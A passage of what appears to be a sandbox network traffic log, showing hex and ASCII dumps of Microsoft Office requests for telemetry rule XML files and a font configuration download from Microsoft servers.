68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-12-07 11:59:28 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.7	49748	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:28 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:28 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: e9e1dff1-101e-0065-7303-484088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115928Z-r1cf579d778z4wflhC1EWRa3h0000000027g00000000456m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:28 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.7	49747	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:28 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:28 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 987987f9-101e-0034-0e02-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115928Z-r1cf579d7788pwqzhC1EWRrpd800000002m0000000001h3z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:28 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49750	23.32.185.164	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:28 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-12-07 11:59:28 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=207934 Date: Sat, 07 Dec 2024 11:59:28 GMT Content-Length: 55 Connection: close X-CID: 2
2024-12-07 11:59:28 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.7	49756	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:30 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:30 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 90a12f2a-001e-0079-1603-4812e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115930Z-r1cf579d778t6txphC1EWRsd4400000002s00000000034t3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:30 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.7	49755	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:30 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:30 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 7b99b195-101e-0017-7009-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115930Z-r1cf579d77867vg8hC1EWR8knc000000024g0000000029x1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:30 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.7	49757	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:30 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:30 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 09188c3a-a01e-0021-2702-48814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115930Z-r1cf579d778dc6d7hC1EWR2vs8000000031g000000000n8k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:30 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.7	49758	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:30 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:30 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 90f2e2a0-001e-0014-5807-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115930Z-r1cf579d778qlpkrhC1EWRpfc800000002z0000000002g1y x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:30 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.7	49759	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:30 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:30 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 75599bc5-d01e-008e-7c03-48387a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115930Z-r1cf579d778xq4f9hC1EWRx41g000000027g0000000003ab x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:30 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.7	49760	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:32 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:32 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 48f2d82f-b01e-0084-1302-48d736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115932Z-r1cf579d778dndrdhC1EWR4b2400000001yg00000000272n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:32 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.7	49761	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:32 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:32 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 1e88822f-901e-0029-0201-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115932Z-r1cf579d778kr8xrhC1EWRfkun00000002mg000000005bdv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:32 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.7	49762	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:32 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:32 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: e333ec31-201e-003f-1d06-486d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115932Z-r1cf579d778zvkpnhC1EWRv23g00000002mg0000000010pc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:32 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.7	49763	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:32 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:33 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:32 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 549300b5-601e-000d-6903-482618000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115932Z-r1cf579d778xq4f9hC1EWRx41g000000020g000000004hyg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
